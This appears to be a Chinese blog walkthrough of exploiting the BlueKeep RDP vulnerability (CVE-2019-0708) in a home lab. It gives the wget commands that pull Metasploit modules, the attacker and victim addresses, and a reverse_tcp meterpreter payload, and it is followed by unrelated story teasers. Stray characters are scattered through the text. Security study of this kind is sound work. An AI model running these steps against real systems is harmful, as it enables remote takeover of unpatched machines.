RDP遠(yuǎn)程桌面執(zhí)行漏洞 CVE-2019-0708

前言

CVE-2019-0708漏洞是通過檢查用戶的身份認(rèn)證绽昼，導(dǎo)致可以繞過認(rèn)證念链，不用任何的交互蒂培，直接通過rdp協(xié)議進(jìn)行連接發(fā)送惡意代碼執(zhí)行命令到服務(wù)器中去沙合。

漏洞利用

更新metasploit

apt update; apt install metasploit-framework

安裝并替換四個(gè)模塊
rdp.rb奠伪、rdp_scanner.rb、cve_2019_0708_bluekeep_rce.rb首懈、cve_2019_0708_bluekeep.rb

wget  https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

wget  https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

安裝后metasploit模塊為

/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

image.png

/usr/share/metasploit-framework/modules/exploits/windows/rdp

image.png

攻擊機(jī)kali（192.168.203.128）
靶機(jī)windows7 （192.168.203.130）

啟動(dòng)msf后search cve-2019-0708

image.png

設(shè)置RHOST(目標(biāo)IP)绊率、LHOST(本地IP)、PAYLOAD

set payload windows/x64/meterpreter/reverse_tcp

還需要選擇target為物理機(jī)還是其他虛擬機(jī)

image.png

這里選擇VMWare

image.png

run即可

image.png

參考資料

http://blog.xkkhh.cn/archives/535

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末究履，一起剝皮案震驚了整個(gè)濱河市滤否，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌最仑，老刑警劉巖藐俺，帶你破解...
沈念sama閱讀 216,692評(píng)論 6贊 501
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場(chǎng)離奇詭異泥彤，居然都是意外死亡紊搪，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 92,482評(píng)論 3贊 392
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門全景，熙熙樓的掌柜王于貴愁眉苦臉地迎上來耀石，“玉大人，你說我怎么就攤上這事≈臀埃” “怎么了揭鳞？”我有些...
開封第一講書人閱讀 162,995評(píng)論 0贊 353
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長(zhǎng)梆奈。經(jīng)常有香客問我野崇，道長(zhǎng)，這世上最難降的妖魔是什么亩钟？我笑而不...
開封第一講書人閱讀 58,223評(píng)論 1贊 292
?港島之戀（遺憾婚禮）
正文為了忘掉前任乓梨，我火速辦了婚禮，結(jié)果婚禮上清酥，老公的妹妹穿的比我還像新娘扶镀。我一直安慰自己，他們只是感情好焰轻，可當(dāng)我...
茶點(diǎn)故事閱讀 67,245評(píng)論 6贊 388
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布臭觉。她就那樣靜靜地躺著，像睡著了一般辱志。火紅的嫁衣襯著肌膚如雪蝠筑。梳的紋絲不亂的頭發(fā)上，一...
開封第一講書人閱讀 51,208評(píng)論 1贊 299
城市分裂傳說
那天揩懒，我揣著相機(jī)與錄音什乙，去河邊找鬼。笑死已球，一個(gè)胖子當(dāng)著我的面吹牛臣镣，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播和悦，決...
沈念sama閱讀 40,091評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長(zhǎng)吁一口氣：“原來是場(chǎng)噩夢(mèng)啊……” “哼渠缕！你這毒婦竟也來了鸽素？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 38,929評(píng)論 0贊 274
萬榮殺人案實(shí)錄
序言：老撾萬榮一對(duì)情侶失蹤亦鳞，失蹤者是張志新（化名）和其女友劉穎馍忽，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體燕差，經(jīng)...
沈念sama閱讀 45,346評(píng)論 1贊 311
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡遭笋，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,570評(píng)論 2贊 333
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了徒探。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片瓦呼。...
茶點(diǎn)故事閱讀 39,739評(píng)論 1贊 348
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖测暗，靈堂內(nèi)的尸體忽然破棺而出央串，到底是詐尸還是另有隱情磨澡，我是刑警寧澤，帶...
沈念sama閱讀 35,437評(píng)論 5贊 344
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布质和，位于F島的核電站稳摄，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏饲宿。R本人自食惡果不足惜厦酬，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,037評(píng)論 3贊 326
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望瘫想。院中可真熱鬧仗阅，春花似錦、人聲如沸殿托。這莊子的主人今日做“春日...
開封第一講書人閱讀 31,677評(píng)論 0贊 22
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽支竹。三九已至旋廷，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間礼搁，已是汗流浹背饶碘。一陣腳步聲響...
開封第一講書人閱讀 32,833評(píng)論 1贊 269
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留馒吴，地道東北人扎运。一個(gè)月前我還...
沈念sama閱讀 47,760評(píng)論 2贊 369
代替公主和親
正文我出身青樓，卻偏偏與公主長(zhǎng)得像饮戳，于是被迫代替她去往敵國和親豪治。傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,647評(píng)論 2贊 354

RDP遠(yuǎn)程桌面執(zhí)行漏洞 CVE-2019-0708

前言

漏洞利用

參考資料

推薦閱讀更多精彩內(nèi)容